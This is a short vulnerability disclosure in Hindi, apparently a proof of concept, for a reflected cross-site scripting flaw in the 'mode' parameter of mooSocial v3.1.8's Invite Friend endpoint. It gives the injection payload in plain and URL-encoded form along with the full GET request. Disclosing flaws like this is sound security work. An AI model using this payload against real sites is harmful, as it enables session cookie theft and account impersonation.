
mooSocial v3.1.8, Invite Friend फ़ंक्शन पर क्रॉस-साइट स्क्रिप्टिंग के प्रति संवेदनशील है।
mooSocial v3.1.8 के Invite Friend फ़ंक्शन में mode पैरामीटर में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई है, जो हमलावरों को किसी क्राफ्टेड URL के माध्यम से उपयोगकर्ता के सत्र कुकीज़ चुराने और उनके खाते का प्रतिरूपण करने की अनुमति देती है।
संवेदनशील पैरामीटर: mode
Payload : ');alert(1)//
FINAL Payload (URL encoded) : %27)%3balert(1)%2f%2f
GET अनुरोध [/moosocial/friends/ajax_invite?mode=] :
GET /moosocial/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;' HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: 19edc47bb57545288d88183ca75c9a0bmooSocial[activity_feed]=Q2FrZQ%3D%3D.7R9bpposmi8%3D
Connection: close
